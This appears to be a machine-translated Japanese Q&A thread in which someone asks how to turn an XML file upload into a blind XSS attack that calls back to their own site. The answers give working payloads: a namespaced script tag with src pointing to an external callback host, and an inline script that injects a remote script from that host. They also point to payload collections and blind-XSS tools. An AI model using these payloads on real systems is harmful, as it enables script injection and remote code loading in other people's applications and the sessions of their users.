XMLファイルのブラインドXSSペイロード?
ブラインドXSSを見つけたかもしれません。アップロードできるのは、バックエンド内で開かれているxmlファイルのみです。私の質問は次のとおりです:このペイロードをブラインドxssペイロードに変換して、私のWebサイトへのpingを受信するにはどうすればよいですか?
<?xml version="1.0"?> <foo> <html xmlns:html='http://www.w3.org/1999/xhtml'> <html:script>Prompt(document.domain);</html:script> </html> </foo>
この文字列から何を変更すればよいですか?
<html:script>Prompt(document.domain);</html:script>
ペイロード全般に適したリソースは「すべてのものをペイロードする」です: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#blind-xss
ブラインドXSSペイロードのほとんどがターゲットで機能しない理由はわかりません。
XML属性はHTML属性として解析されますか?
<html:script src=//yoursubdomain.xss.ht>Prompt(document.domain);</html:script>
タグ内にとどまろうとしている場合:
<html:script>var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)</html:script>
試すことができる他のいくつかのペイロードと、ブラインドXSSを見つけるために使用できるいくつかのツールがあります。
- XSSHunter
- bXSS
- ezXSS